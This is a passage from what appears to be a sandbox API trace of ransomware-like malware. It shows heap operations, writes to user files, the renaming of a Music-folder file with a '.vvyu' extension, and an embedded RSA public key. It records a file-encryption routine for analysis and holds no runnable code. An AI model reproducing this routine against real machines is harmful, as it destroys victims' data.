(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d550 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a498 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d598 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4b0 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4e0 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a540 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4f8 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0198.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0198.097] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0198.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0198.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0198.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0198.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0198.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a540 [0198.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0198.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4f8 [0198.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0198.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a4e0 [0198.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0198.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0198.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0198.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0198.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0198.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0198.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0198.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0198.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0198.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0198.100] GetCurrentThreadId () returned 0x264 [0198.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0198.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c1b0 [0198.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0198.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0198.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0198.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0198.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.101] GetCurrentThreadId () returned 0x264 [0198.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0198.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0198.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a540 [0198.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4e0 [0198.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0198.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0198.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0198.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0198.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4f8 [0198.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0198.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0198.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0198.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4c8 [0198.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0198.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a558 [0198.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0198.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a528 [0198.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a510 [0198.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a570 [0198.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a510 [0198.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0198.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0198.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0198.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4e0 [0198.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0198.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0198.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0198.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0198.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0198.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0198.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0198.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0198.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0198.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0198.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0198.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0198.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0198.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0198.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0198.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0198.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d598 | out: hHeap=0x6a0000) returned 1 [0198.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0198.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0198.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0198.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0198.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0198.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0198.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0198.115] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x869c, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x869c, lpOverlapped=0x0) returned 1 [0198.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0198.116] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x86a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.116] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0198.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0198.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0198.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0198.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0198.118] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0198.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.118] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.118] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0198.118] CloseHandle (hObject=0x52c) returned 1 [0198.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf0) returned 0x2be2220 [0198.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8f0) returned 0x2d3a670 [0198.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.121] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\L69lCXnVIkB5VvHCZYX.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\l69lcxnvikb5vvhczyx.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\L69lCXnVIkB5VvHCZYX.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\l69lcxnvikb5vvhczyx.m4a.vvyu")) returned 1 [0198.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0198.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.124] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.128] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137f8540, ftCreationTime.dwHighDateTime=0x1d89ca9, ftLastAccessTime.dwLowDateTime=0x2d84a700, ftLastAccessTime.dwHighDateTime=0x1d89ebf, ftLastWriteTime.dwLowDateTime=0x2d84a700, ftLastWriteTime.dwHighDateTime=0x1d89ebf, nFileSizeHigh=0x0, nFileSizeLow=0x123c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RNqKcz9LI.mp3", cAlternateFileName="RNQKCZ~1.MP3")) returned 1 [0198.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0198.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11e) returned 0x2d31688 [0198.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0198.128] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\RNqKcz9LI.mp3") returned=".mp3" [0198.128] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\RNqKcz9LI.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\rnqkcz9li.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0198.132] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=74689) returned 1 [0198.132] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0198.135] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x1239b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.135] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0198.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.137] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.137] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x123c1, lpOverlapped=0x0) returned 1 [0198.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0198.138] lstrlenA (lpString="-----BEGIN PUBLIC 